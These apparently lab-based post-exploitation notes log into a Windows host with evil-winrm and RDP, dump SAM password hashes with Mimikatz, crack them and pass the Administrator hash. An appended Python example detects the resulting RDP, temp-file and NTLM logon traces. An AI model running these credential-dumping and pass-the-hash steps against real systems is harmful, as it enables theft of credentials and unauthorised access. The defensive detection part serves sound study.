# Post Exploitation

## Stabilization and Persistence

```bash
evil-winrm -u adot8 -p password1 -i 10.200.101.150
```

Or connect over RDP:

```bash
xfreerdp /u:adot8 /p:password1 /v:10.200.101.150 +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share
```

{% hint style="warning" %}
`/drive` creates a shared drive between you and the machine. Access it in File Explorer at `\\tsclient`.
{% endhint %}

## Mimikatz

Run Mimikatz as Administrator:

```text
privilege::debug
token::elevate
log c:\windows\temp\sam.log
lsadump::sam
```

Use CrackStation to crack Thomas's and Arheo5's NTLM hashes.

Pass the Administrator's hash in evil-winrm.
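For the reporting side of this step, the following added example (not part of the original notes) triages Windows events for the traces the activity above leaves: an RDP logon, a file written under `C:\Windows\Temp` by a binary outside system directories, and an NTLM network logon to a privileged account. The event records, source IPs, account allowlists and rule names are constructed assumptions; the field names follow Security event 4624 and Sysmon event 11.

```python
# Added example: triage of constructed Windows events (Security 4624, Sysmon 11).
PRIVILEGED = {"administrator"}        # assumption: accounts worth alerting on
ADMIN_HOSTS = {"10.200.101.10"}       # assumption: approved admin source IPs
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\")

SAMPLE_EVENTS = [  # constructed sample data, not captured from a real host
    {"EventID": 4624, "LogonType": 10, "TargetUserName": "adot8",
     "AuthenticationPackageName": "Negotiate", "IpAddress": "10.50.0.5"},
    {"EventID": 11, "Image": r"C:\Users\adot8\Desktop\tool.exe",
     "TargetFilename": r"C:\Windows\Temp\sam.log"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "Administrator",
     "AuthenticationPackageName": "NTLM", "IpAddress": "10.50.0.5"},
    {"EventID": 4624, "LogonType": 3, "TargetUserName": "svc_backup",
     "AuthenticationPackageName": "Kerberos", "IpAddress": "10.200.101.10"},
]

def triage(events):
    """Return (event index, rule name) pairs for events worth an analyst's look."""
    findings, users_by_ip = [], {}
    for i, ev in enumerate(events):
        if ev["EventID"] == 4624:                      # successful logon
            user, ip = ev["TargetUserName"].lower(), ev["IpAddress"]
            seen = users_by_ip.setdefault(ip, set())
            if ev["LogonType"] == 10:                  # RemoteInteractive (RDP)
                findings.append((i, "rdp-logon"))
            if (ev["LogonType"] == 3                   # network logon (e.g. WinRM)
                    and ev["AuthenticationPackageName"] == "NTLM"
                    and user in PRIVILEGED and ip not in ADMIN_HOSTS):
                findings.append((i, "ntlm-privileged-network-logon"))
                if seen - {user}:                      # same source, other account earlier
                    findings.append((i, "account-switch-from-same-source"))
            seen.add(user)
        elif ev["EventID"] == 11:                      # Sysmon FileCreate
            target, image = ev["TargetFilename"].lower(), ev["Image"].lower()
            if (target.startswith("c:\\windows\\temp\\")
                    and not image.startswith(TRUSTED_DIRS)):
                findings.append((i, "temp-write-by-untrusted-image"))
    return findings

if __name__ == "__main__":
    for index, rule in triage(SAMPLE_EVENTS):
        print(index, rule)
```

The NTLM rule is a heuristic: it flags privileged network logons from unapproved sources and cannot by itself distinguish a passed hash from a typed password.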

